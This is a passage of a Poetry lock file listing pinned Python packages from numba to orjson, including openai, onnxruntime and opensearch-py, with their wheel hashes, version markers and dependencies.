"numba-0.58.1.tar.gz", hash = "sha256:487ded0633efccd9ca3a46364b40006dbdaca0f95e99b8b83e778d1195ebcbaa"}, ] [package.dependencies] importlib-metadata = {version = "*", markers = "python_version < \"3.9\""} llvmlite = "==0.41.*" numpy = ">=1.22,<1.27" [[package]] name = "numexpr" version = "2.8.6" description = "Fast numerical expression evaluator for NumPy" optional = true python-versions = ">=3.7" files = [ {file = "numexpr-2.8.6-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:80acbfefb68bd92e708e09f0a02b29e04d388b9ae72f9fcd57988aca172a7833"}, {file = "numexpr-2.8.6-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:6e884687da8af5955dc9beb6a12d469675c90b8fb38b6c93668c989cfc2cd982"}, {file = "numexpr-2.8.6-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9ef7e8aaa84fce3aba2e65f243d14a9f8cc92aafd5d90d67283815febfe43eeb"}, {file = "numexpr-2.8.6-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:dee04d72307c09599f786b9231acffb10df7d7a74b2ce3681d74a574880d13ce"}, {file = "numexpr-2.8.6-cp310-cp310-win32.whl", hash = "sha256:211804ec25a9f6d188eadf4198dd1a92b2f61d7d20993c6c7706139bc4199c5b"}, {file = "numexpr-2.8.6-cp310-cp310-win_amd64.whl", hash = "sha256:18b1804923cfa3be7bbb45187d01c0540c8f6df4928c22a0f786e15568e9ebc5"}, {file = "numexpr-2.8.6-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:95b9da613761e4fc79748535b2a1f58cada22500e22713ae7d9571fa88d1c2e2"}, {file = "numexpr-2.8.6-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:47b45da5aa25600081a649f5e8b2aa640e35db3703f4631f34bb1f2f86d1b5b4"}, {file = "numexpr-2.8.6-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:84979bf14143351c2db8d9dd7fef8aca027c66ad9df9cb5e75c93bf5f7b5a338"}, {file = 
"numexpr-2.8.6-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d36528a33aa9c23743b3ea686e57526a4f71e7128a1be66210e1511b09c4e4e9"}, {file = "numexpr-2.8.6-cp311-cp311-win32.whl", hash = "sha256:681812e2e71ff1ba9145fac42d03f51ddf6ba911259aa83041323f68e7458002"}, {file = "numexpr-2.8.6-cp311-cp311-win_amd64.whl", hash = "sha256:27782177a0081bd0aab229be5d37674e7f0ab4264ef576697323dd047432a4cd"}, {file = "numexpr-2.8.6-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:ef6e8896457a60a539cb6ba27da78315a9bb31edb246829b25b5b0304bfcee91"}, {file = "numexpr-2.8.6-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e640bc0eaf1b59f3dde52bc02bbfda98e62f9950202b0584deba28baf9f36bbb"}, {file = "numexpr-2.8.6-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d126938c2c3784673c9c58d94e00b1570aa65517d9c33662234d442fc9fb5795"}, {file = "numexpr-2.8.6-cp37-cp37m-win32.whl", hash = "sha256:e93d64cd20940b726477c3cb64926e683d31b778a1e18f9079a5088fd0d8e7c8"}, {file = "numexpr-2.8.6-cp37-cp37m-win_amd64.whl", hash = "sha256:31cf610c952eec57081171f0b4427f9bed2395ec70ec432bbf45d260c5c0cdeb"}, {file = "numexpr-2.8.6-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:b5f96c89aa0b1f13685ec32fa3d71028db0b5981bfd99a0bbc271035949136b3"}, {file = "numexpr-2.8.6-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:c8f37f7a6af3bdd61f2efd1cafcc083a9525ab0aaf5dc641e7ec8fc0ae2d3aa1"}, {file = "numexpr-2.8.6-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:38b8b90967026bbc36c7aa6e8ca3b8906e1990914fd21f446e2a043f4ee3bc06"}, {file = "numexpr-2.8.6-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1967c16f61c27df1cdc43ba3c0ba30346157048dd420b4259832276144d0f64e"}, {file = "numexpr-2.8.6-cp38-cp38-win32.whl", hash = "sha256:15469dc722b5ceb92324ec8635411355ebc702303db901ae8cc87f47c5e3a124"}, {file = "numexpr-2.8.6-cp38-cp38-win_amd64.whl", hash = "sha256:95c09e814b0d6549de98b5ded7cdf7d954d934bb6b505432ff82e83a6d330bda"}, {file = "numexpr-2.8.6-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:aa0f661f5f4872fd7350cc9895f5d2594794b2a7e7f1961649a351724c64acc9"}, {file = "numexpr-2.8.6-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:8e3e6f1588d6c03877cb3b3dcc3096482da9d330013b886b29cb9586af5af3eb"}, {file = "numexpr-2.8.6-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:8564186aad5a2c88d597ebc79b8171b52fd33e9b085013e1ff2208f7e4b387e3"}, {file = "numexpr-2.8.6-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d6a88d71c166e86b98d34701285d23e3e89d548d9f5ae3f4b60919ac7151949f"}, {file = "numexpr-2.8.6-cp39-cp39-win32.whl", hash = "sha256:c48221b6a85494a7be5a022899764e58259af585dff031cecab337277278cc93"}, {file = "numexpr-2.8.6-cp39-cp39-win_amd64.whl", hash = "sha256:6d7003497d82ef19458dce380b36a99343b96a3bd5773465c2d898bf8f5a38f9"}, {file = "numexpr-2.8.6.tar.gz", hash = "sha256:6336f8dba3f456e41a4ffc3c97eb63d89c73589ff6e1707141224b930263260d"}, ] [package.dependencies] numpy = ">=1.13.3" [[package]] name = "numpy" version = "1.24.4" description = "Fundamental package for array computing in Python" optional = false python-versions = ">=3.8" files = [ {file = "numpy-1.24.4-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:c0bfb52d2169d58c1cdb8cc1f16989101639b34c7d3ce60ed70b19c63eba0b64"}, {file = "numpy-1.24.4-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:ed094d4f0c177b1b8e7aa9cba7d6ceed51c0e569a5318ac0ca9a090680a6a1b1"}, {file = 
"numpy-1.24.4-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:79fc682a374c4a8ed08b331bef9c5f582585d1048fa6d80bc6c35bc384eee9b4"}, {file = "numpy-1.24.4-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:7ffe43c74893dbf38c2b0a1f5428760a1a9c98285553c89e12d70a96a7f3a4d6"}, {file = "numpy-1.24.4-cp310-cp310-win32.whl", hash = "sha256:4c21decb6ea94057331e111a5bed9a79d335658c27ce2adb580fb4d54f2ad9bc"}, {file = "numpy-1.24.4-cp310-cp310-win_amd64.whl", hash = "sha256:b4bea75e47d9586d31e892a7401f76e909712a0fd510f58f5337bea9572c571e"}, {file = "numpy-1.24.4-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:f136bab9c2cfd8da131132c2cf6cc27331dd6fae65f95f69dcd4ae3c3639c810"}, {file = "numpy-1.24.4-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:e2926dac25b313635e4d6cf4dc4e51c8c0ebfed60b801c799ffc4c32bf3d1254"}, {file = "numpy-1.24.4-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:222e40d0e2548690405b0b3c7b21d1169117391c2e82c378467ef9ab4c8f0da7"}, {file = "numpy-1.24.4-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:7215847ce88a85ce39baf9e89070cb860c98fdddacbaa6c0da3ffb31b3350bd5"}, {file = "numpy-1.24.4-cp311-cp311-win32.whl", hash = "sha256:4979217d7de511a8d57f4b4b5b2b965f707768440c17cb70fbf254c4b225238d"}, {file = "numpy-1.24.4-cp311-cp311-win_amd64.whl", hash = "sha256:b7b1fc9864d7d39e28f41d089bfd6353cb5f27ecd9905348c24187a768c79694"}, {file = "numpy-1.24.4-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:1452241c290f3e2a312c137a9999cdbf63f78864d63c79039bda65ee86943f61"}, {file = "numpy-1.24.4-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:04640dab83f7c6c85abf9cd729c5b65f1ebd0ccf9de90b270cd61935eef0197f"}, {file = "numpy-1.24.4-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a5425b114831d1e77e4b5d812b69d11d962e104095a5b9c3b641a218abcc050e"}, {file = "numpy-1.24.4-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:dd80e219fd4c71fc3699fc1dadac5dcf4fd882bfc6f7ec53d30fa197b8ee22dc"}, {file = "numpy-1.24.4-cp38-cp38-win32.whl", hash = "sha256:4602244f345453db537be5314d3983dbf5834a9701b7723ec28923e2889e0bb2"}, {file = "numpy-1.24.4-cp38-cp38-win_amd64.whl", hash = "sha256:692f2e0f55794943c5bfff12b3f56f99af76f902fc47487bdfe97856de51a706"}, {file = "numpy-1.24.4-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:2541312fbf09977f3b3ad449c4e5f4bb55d0dbf79226d7724211acc905049400"}, {file = "numpy-1.24.4-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:9667575fb6d13c95f1b36aca12c5ee3356bf001b714fc354eb5465ce1609e62f"}, {file = "numpy-1.24.4-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f3a86ed21e4f87050382c7bc96571755193c4c1392490744ac73d660e8f564a9"}, {file = "numpy-1.24.4-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d11efb4dbecbdf22508d55e48d9c8384db795e1b7b51ea735289ff96613ff74d"}, {file = "numpy-1.24.4-cp39-cp39-win32.whl", hash = "sha256:6620c0acd41dbcb368610bb2f4d83145674040025e5536954782467100aa8835"}, {file = "numpy-1.24.4-cp39-cp39-win_amd64.whl", hash = "sha256:befe2bf740fd8373cf56149a5c23a0f601e82869598d41f8e188a0e9869926f8"}, {file = "numpy-1.24.4-pp38-pypy38_pp73-macosx_10_9_x86_64.whl", hash = "sha256:31f13e25b4e304632a4619d0e0777662c2ffea99fcae2029556b17d8ff958aef"}, {file = "numpy-1.24.4-pp38-pypy38_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:95f7ac6540e95bc440ad77f56e520da5bf877f87dca58bd095288dce8940532a"}, {file = 
"numpy-1.24.4-pp38-pypy38_pp73-win_amd64.whl", hash = "sha256:e98f220aa76ca2a977fe435f5b04d7b3470c0a2e6312907b37ba6068f26787f2"}, {file = "numpy-1.24.4.tar.gz", hash = "sha256:80f5e3a4e498641401868df4208b74581206afbee7cf7b8329daae82676d9463"}, ] [[package]] name = "nvidia-cublas-cu11" version = "11.10.3.66" description = "CUBLAS native runtime libraries" optional = true python-versions = ">=3" files = [ {file = "nvidia_cublas_cu11-11.10.3.66-py3-none-manylinux1_x86_64.whl", hash = "sha256:d32e4d75f94ddfb93ea0a5dda08389bcc65d8916a25cb9f37ac89edaeed3bded"}, {file = "nvidia_cublas_cu11-11.10.3.66-py3-none-win_amd64.whl", hash = "sha256:8ac17ba6ade3ed56ab898a036f9ae0756f1e81052a317bf98f8c6d18dc3ae49e"}, ] [package.dependencies] setuptools = "*" wheel = "*" [[package]] name = "nvidia-cuda-nvrtc-cu11" version = "11.7.99" description = "NVRTC native runtime libraries" optional = true python-versions = ">=3" files = [ {file = "nvidia_cuda_nvrtc_cu11-11.7.99-2-py3-none-manylinux1_x86_64.whl", hash = "sha256:9f1562822ea264b7e34ed5930567e89242d266448e936b85bc97a3370feabb03"}, {file = "nvidia_cuda_nvrtc_cu11-11.7.99-py3-none-manylinux1_x86_64.whl", hash = "sha256:f7d9610d9b7c331fa0da2d1b2858a4a8315e6d49765091d28711c8946e7425e7"}, {file = "nvidia_cuda_nvrtc_cu11-11.7.99-py3-none-win_amd64.whl", hash = "sha256:f2effeb1309bdd1b3854fc9b17eaf997808f8b25968ce0c7070945c4265d64a3"}, ] [package.dependencies] setuptools = "*" wheel = "*" [[package]] name = "nvidia-cuda-runtime-cu11" version = "11.7.99" description = "CUDA Runtime native Libraries" optional = true python-versions = ">=3" files = [ {file = "nvidia_cuda_runtime_cu11-11.7.99-py3-none-manylinux1_x86_64.whl", hash = "sha256:cc768314ae58d2641f07eac350f40f99dcb35719c4faff4bc458a7cd2b119e31"}, {file = "nvidia_cuda_runtime_cu11-11.7.99-py3-none-win_amd64.whl", hash = "sha256:bc77fa59a7679310df9d5c70ab13c4e34c64ae2124dd1efd7e5474b71be125c7"}, ] [package.dependencies] setuptools = "*" wheel = "*" [[package]] name = "nvidia-cudnn-cu11" version = "8.5.0.96" description = "cuDNN runtime libraries" optional = true python-versions = ">=3" files = [ {file = "nvidia_cudnn_cu11-8.5.0.96-2-py3-none-manylinux1_x86_64.whl", hash = "sha256:402f40adfc6f418f9dae9ab402e773cfed9beae52333f6d86ae3107a1b9527e7"}, {file = "nvidia_cudnn_cu11-8.5.0.96-py3-none-manylinux1_x86_64.whl", hash = "sha256:71f8111eb830879ff2836db3cccf03bbd735df9b0d17cd93761732ac50a8a108"}, ] [package.dependencies] setuptools = "*" wheel = "*" [[package]] name = "o365" version = "2.0.28" description = "Microsoft Graph and Office 365 API made easy" optional = true python-versions = ">=3.4" files = [ {file = "O365-2.0.28-py3-none-any.whl", hash = "sha256:61127377a4f5ed55f447ad20fbd02d78f06b50696b12f3ad2c608bdf911eef7b"}, {file = "O365-2.0.28.tar.gz", hash = "sha256:f1ab2f8ecaa399da7202df554a0b55a70358bbaead82bb0fcd048e67aac822f3"}, ] [package.dependencies] beautifulsoup4 = ">=4.0.0" python-dateutil = ">=2.7" pytz = ">=2018.5" requests = ">=2.18.0" requests-oauthlib = ">=1.2.0" stringcase = ">=1.2.0" tzlocal = ">=4.0,<5.0" [[package]] name = "oauthlib" version = "3.2.2" description = "A generic, spec-compliant, thorough implementation of the OAuth request-signing logic" optional = true python-versions = ">=3.6" files = [ {file = "oauthlib-3.2.2-py3-none-any.whl", hash = "sha256:8139f29aac13e25d502680e9e19963e83f16838d48a0d71c287fe40e7067fbca"}, {file = "oauthlib-3.2.2.tar.gz", hash = "sha256:9859c40929662bec5d64f34d01c99e093149682a3f38915dc0655d5a633dd918"}, ] [package.extras] rsa = ["cryptography 
(>=3.0.0)"] signals = ["blinker (>=1.4.0)"] signedtoken = ["cryptography (>=3.0.0)", "pyjwt (>=2.0.0,<3)"] [[package]] name = "onnxruntime" version = "1.16.1" description = "ONNX Runtime is a runtime accelerator for Machine Learning models" optional = true python-versions = "*" files = [ {file = "onnxruntime-1.16.1-cp310-cp310-macosx_10_15_x86_64.whl", hash = "sha256:28b2c7f444b4119950b69370801cd66067f403d19cbaf2a444735d7c269cce4a"}, {file = "onnxruntime-1.16.1-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:c24e04f33e7899f6aebb03ed51e51d346c1f906b05c5569d58ac9a12d38a2f58"}, {file = "onnxruntime-1.16.1-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9fa93b166f2d97063dc9f33c5118c5729a4a5dd5617296b6dbef42f9047b3e81"}, {file = "onnxruntime-1.16.1-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:042dd9201b3016ee18f8f8bc4609baf11ff34ca1ff489c0a46bcd30919bf883d"}, {file = "onnxruntime-1.16.1-cp310-cp310-win32.whl", hash = "sha256:c20aa0591f305012f1b21aad607ed96917c86ae7aede4a4dd95824b3d124ceb7"}, {file = "onnxruntime-1.16.1-cp310-cp310-win_amd64.whl", hash = "sha256:5581873e578917bea76d6434ee7337e28195d03488dcf72d161d08e9398c6249"}, {file = "onnxruntime-1.16.1-cp311-cp311-macosx_10_15_x86_64.whl", hash = "sha256:ef8c0c8abf5f309aa1caf35941380839dc5f7a2fa53da533be4a3f254993f120"}, {file = "onnxruntime-1.16.1-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:e680380bea35a137cbc3efd67a17486e96972901192ad3026ee79c8d8fe264f7"}, {file = "onnxruntime-1.16.1-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:5e62cc38ce1a669013d0a596d984762dc9c67c56f60ecfeee0d5ad36da5863f6"}, {file = "onnxruntime-1.16.1-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:025c7a4d57bd2e63b8a0f84ad3df53e419e3df1cc72d63184f2aae807b17c13c"}, {file = "onnxruntime-1.16.1-cp311-cp311-win32.whl", hash = "sha256:9ad074057fa8d028df248b5668514088cb0937b6ac5954073b7fb9b2891ffc8c"}, {file = "onnxruntime-1.16.1-cp311-cp311-win_amd64.whl", hash = "sha256:d5e43a3478bffc01f817ecf826de7b25a2ca1bca8547d70888594ab80a77ad24"}, {file = "onnxruntime-1.16.1-cp38-cp38-macosx_10_15_x86_64.whl", hash = "sha256:3aef4d70b0930e29a8943eab248cd1565664458d3a62b2276bd11181f28fd0a3"}, {file = "onnxruntime-1.16.1-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:55a7b843a57c8ca0c8ff169428137958146081d5d76f1a6dd444c4ffcd37c3c2"}, {file = "onnxruntime-1.16.1-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:62c631af1941bf3b5f7d063d24c04aacce8cff0794e157c497e315e89ac5ad7b"}, {file = "onnxruntime-1.16.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:5671f296c3d5c233f601e97a10ab5a1dd8e65ba35c7b7b0c253332aba9dff330"}, {file = "onnxruntime-1.16.1-cp38-cp38-win32.whl", hash = "sha256:eb3802305023dd05e16848d4e22b41f8147247894309c0c27122aaa08793b3d2"}, {file = "onnxruntime-1.16.1-cp38-cp38-win_amd64.whl", hash = "sha256:fecfb07443d09d271b1487f401fbdf1ba0c829af6fd4fe8f6af25f71190e7eb9"}, {file = "onnxruntime-1.16.1-cp39-cp39-macosx_10_15_x86_64.whl", hash = "sha256:de3e12094234db6545c67adbf801874b4eb91e9f299bda34c62967ef0050960f"}, {file = "onnxruntime-1.16.1-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:ff723c2a5621b5e7103f3be84d5aae1e03a20621e72219dddceae81f65f240af"}, {file = "onnxruntime-1.16.1-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:14a7fb3073aaf6b462e3d7fb433320f7700558a8892e5021780522dc4574292a"}, {file = 
"onnxruntime-1.16.1-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:963159f1f699b0454cd72fcef3276c8a1aab9389a7b301bcd8e320fb9d9e8597"}, {file = "onnxruntime-1.16.1-cp39-cp39-win32.whl", hash = "sha256:85771adb75190db9364b25ddec353ebf07635b83eb94b64ed014f1f6d57a3857"}, {file = "onnxruntime-1.16.1-cp39-cp39-win_amd64.whl", hash = "sha256:d32d2b30799c1f950123c60ae8390818381fd5f88bdf3627eeca10071c155dc5"}, ] [package.dependencies] coloredlogs = "*" flatbuffers = "*" numpy = ">=1.21.6" packaging = "*" protobuf = "*" sympy = "*" [[package]] name = "openai" version = "0.27.10" description = "Python client library for the OpenAI API" optional = false python-versions = ">=3.7.1" files = [ {file = "openai-0.27.10-py3-none-any.whl", hash = "sha256:beabd1757e3286fa166dde3b70ebb5ad8081af046876b47c14c41e203ed22a14"}, {file = "openai-0.27.10.tar.gz", hash = "sha256:60e09edf7100080283688748c6803b7b3b52d5a55d21890f3815292a0552d83b"}, ] [package.dependencies] aiohttp = "*" requests = ">=2.20" tqdm = "*" [package.extras] datalib = ["numpy", "openpyxl (>=3.0.7)", "pandas (>=1.2.3)", "pandas-stubs (>=1.1.0.11)"] dev = ["black (>=21.6b0,<22.0)", "pytest (==6.*)", "pytest-asyncio", "pytest-mock"] embeddings = ["matplotlib", "numpy", "openpyxl (>=3.0.7)", "pandas (>=1.2.3)", "pandas-stubs (>=1.1.0.11)", "plotly", "scikit-learn (>=1.0.2)", "scipy", "tenacity (>=8.0.1)"] wandb = ["numpy", "openpyxl (>=3.0.7)", "pandas (>=1.2.3)", "pandas-stubs (>=1.1.0.11)", "wandb"] [[package]] name = "openapi-pydantic" version = "0.3.2" description = "Pydantic OpenAPI schema implementation" optional = true python-versions = ">=3.8,<4.0" files = [ {file = "openapi_pydantic-0.3.2-py3-none-any.whl", hash = "sha256:24488566a0a61bee3b55de6d3665329adaf2aadfe8f292ac0bddfe22155fadac"}, {file = "openapi_pydantic-0.3.2.tar.gz", hash = "sha256:685aa631395c469ecfd04f01a2ffedd541f94d372943868a501b412e9de6ba8b"}, ] [package.dependencies] pydantic = ">=1.8" [[package]] name = "opencv-python" version = "4.8.1.78" description = "Wrapper package for OpenCV python bindings." 
optional = true python-versions = ">=3.6" files = [ {file = "opencv-python-4.8.1.78.tar.gz", hash = "sha256:cc7adbbcd1112877a39274106cb2752e04984bc01a031162952e97450d6117f6"}, {file = "opencv_python-4.8.1.78-cp37-abi3-macosx_10_16_x86_64.whl", hash = "sha256:91d5f6f5209dc2635d496f6b8ca6573ecdad051a09e6b5de4c399b8e673c60da"}, {file = "opencv_python-4.8.1.78-cp37-abi3-macosx_11_0_arm64.whl", hash = "sha256:bc31f47e05447da8b3089faa0a07ffe80e114c91ce0b171e6424f9badbd1c5cd"}, {file = "opencv_python-4.8.1.78-cp37-abi3-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9814beca408d3a0eca1bae7e3e5be68b07c17ecceb392b94170881216e09b319"}, {file = "opencv_python-4.8.1.78-cp37-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c4c406bdb41eb21ea51b4e90dfbc989c002786c3f601c236a99c59a54670a394"}, {file = "opencv_python-4.8.1.78-cp37-abi3-win32.whl", hash = "sha256:a7aac3900fbacf55b551e7b53626c3dad4c71ce85643645c43e91fcb19045e47"}, {file = "opencv_python-4.8.1.78-cp37-abi3-win_amd64.whl", hash = "sha256:b983197f97cfa6fcb74e1da1802c7497a6f94ed561aba6980f1f33123f904956"}, ] [package.dependencies] numpy = [ {version = ">=1.23.5", markers = "python_version >= \"3.11\""}, {version = ">=1.21.0", markers = "python_version <= \"3.9\" and platform_system == \"Darwin\" and platform_machine == \"arm64\" and python_version >= \"3.8\""}, {version = ">=1.19.3", markers = "platform_system == \"Linux\" and platform_machine == \"aarch64\" and python_version >= \"3.8\" and python_version < \"3.10\" or python_version > \"3.9\" and python_version < \"3.10\" or python_version >= \"3.9\" and platform_system != \"Darwin\" and python_version < \"3.10\" or python_version >= \"3.9\" and platform_machine != \"arm64\" and python_version < \"3.10\""}, {version = ">=1.17.3", markers = "(platform_system != \"Darwin\" and platform_system != \"Linux\") and python_version >= \"3.8\" and python_version < \"3.9\" or platform_system != \"Darwin\" and python_version >= \"3.8\" and python_version < \"3.9\" and platform_machine != \"aarch64\" or platform_machine != \"arm64\" and python_version >= \"3.8\" and python_version < \"3.9\" and platform_system != \"Linux\" or (platform_machine != \"arm64\" and platform_machine != \"aarch64\") and python_version >= \"3.8\" and python_version < \"3.9\""}, {version = ">=1.21.4", markers = "python_version >= \"3.10\" and platform_system == \"Darwin\" and python_version < \"3.11\""}, {version = ">=1.21.2", markers = "platform_system != \"Darwin\" and python_version >= \"3.10\" and python_version < \"3.11\""}, ] [[package]] name = "openlm" version = "0.0.5" description = "Drop-in OpenAI-compatible that can call LLMs from other providers" optional = true python-versions = ">=3.8.1,<4.0" files = [ {file = "openlm-0.0.5-py3-none-any.whl", hash = "sha256:9fcbbc575d2869e2a6c0b00827f9be2189c067c2de4bf03ef3cbdf488367ae93"}, {file = "openlm-0.0.5.tar.gz", hash = "sha256:0eb3fd7a9e4f7b4248931ff2f0dc91c525d990b99956886861a1b3f9868bc451"}, ] [package.dependencies] requests = ">=2,<3" [[package]] name = "opensearch-py" version = "2.3.2" description = "Python client for OpenSearch" optional = true python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, <4" files = [ {file = "opensearch-py-2.3.2.tar.gz", hash = "sha256:96e470b55107fd5bfd873722dc9808c333360eacfa174341f5cc2d021aa30448"}, {file = "opensearch_py-2.3.2-py2.py3-none-any.whl", hash = "sha256:b1d6607380c8f19d90c142470939d051f0bac96069ce0ac25970b3c39c431f8b"}, ] [package.dependencies] certifi = ">=2022.12.07" python-dateutil 
= "*" requests = ">=2.4.0,<3.0.0" six = "*" urllib3 = ">=1.26.9" [package.extras] async = ["aiohttp (>=3,<4)"] develop = ["black", "botocore", "coverage (<7.0.0)", "jinja2", "mock", "myst-parser", "pytest (>=3.0.0)", "pytest-cov", "pytest-mock (<4.0.0)", "pytz", "pyyaml", "requests (>=2.0.0,<3.0.0)", "sphinx", "sphinx-copybutton", "sphinx-rtd-theme"] docs = ["myst-parser", "sphinx", "sphinx-copybutton", "sphinx-rtd-theme"] kerberos = ["requests-kerberos"] [[package]] name = "opt-einsum" version = "3.3.0" description = "Optimizing numpys einsum function" optional = true python-versions = ">=3.5" files = [ {file = "opt_einsum-3.3.0-py3-none-any.whl", hash = "sha256:2455e59e3947d3c275477df7f5205b30635e266fe6dc300e3d9f9646bfcea147"}, {file = "opt_einsum-3.3.0.tar.gz", hash = "sha256:59f6475f77bbc37dcf7cd748519c0ec60722e91e63ca114e68821c0c54a46549"}, ] [package.dependencies] numpy = ">=1.7" [package.extras] docs = ["numpydoc", "sphinx (==1.2.3)", "sphinx-rtd-theme", "sphinxcontrib-napoleon"] tests = ["pytest", "pytest-cov", "pytest-pep8"] [[package]] name = "orjson" version = "3.9.10" description = "Fast, correct Python JSON library supporting dataclasses, datetimes, and numpy" optional = true python-versions = ">=3.8" files = [ {file = "orjson-3.9.10-cp310-cp310-macosx_10_15_x86_64.macosx_11_0_arm64.macosx_10_15_universal2.whl", hash = "sha256:c18a4da2f50050a03d1da5317388ef84a16013302a5281d6f64e4a3f406aabc4"}, {file = "orjson-3.9.10-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:5148bab4d71f58948c7c39d12b14a9005b6ab35a0bdf317a8ade9a9e4d9d0bd5"}, {file = "orjson-3.9.10-cp310-cp310-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:4cf7837c3b11a2dfb589f8530b3cff2bd0307ace4c301e8997e95c7468c1378e"}, {file = "orjson-3.9.10-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:c62b6fa2961a1dcc51ebe88771be5319a93fd89bd247c9ddf732bc250507bc2b"}, {file = "orjson-3.9.10-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:deeb3922a7a804755bbe6b5be9b312e746137a03600f488290318936c1a2d4dc"}, {file = "orjson-3.9.10-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1234dc92d011d3554d929b6cf058ac4a24d188d97be5e04355f1b9223e98bbe9"}, {file = "orjson-3.9.10-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:06ad5543217e0e46fd7ab7ea45d506c76f878b87b1b4e369006bdb01acc05a83"}, {file = "orjson-3.9.10-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:4fd72fab7bddce46c6826994ce1e7de145ae1e9e106ebb8eb9ce1393ca01444d"}, {file = "orjson-3.9.10-cp310-none-win32.whl", hash = "sha256:b5b7d4a44cc0e6ff98da5d56cde794385bdd212a86563ac321ca64d7f80c80d1"}, {file = "orjson-3.9.10-cp310-none-win_amd64.whl", hash = "sha256:61804231099214e2f84998316f3238c4c2c4aaec302df12b21a64d72e2a135c7"}, {file = "orjson-3.9.10-cp311-cp311-macosx_10_15_x86_64.macosx_11_0_arm64.macosx_10_15_universal2.whl", hash = "sha256:cff7570d492bcf4b64cc862a6e2fb77edd5e5748ad715f487628f102815165e9"}, {file = "orjson-3.9.10-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:ed8bc367f725dfc5cabeed1ae079d00369900231fbb5a5280cf0736c30e2adf7"}, {file = "orjson-3.9.10-cp311-cp311-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:c812312847867b6335cfb264772f2a7e85b3b502d3a6b0586aa35e1858528ab1"}, {file = "orjson-3.9.10-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:9edd2856611e5050004f4722922b7b1cd6268da34102667bd49d2a2b18bafb81"}, {file = 
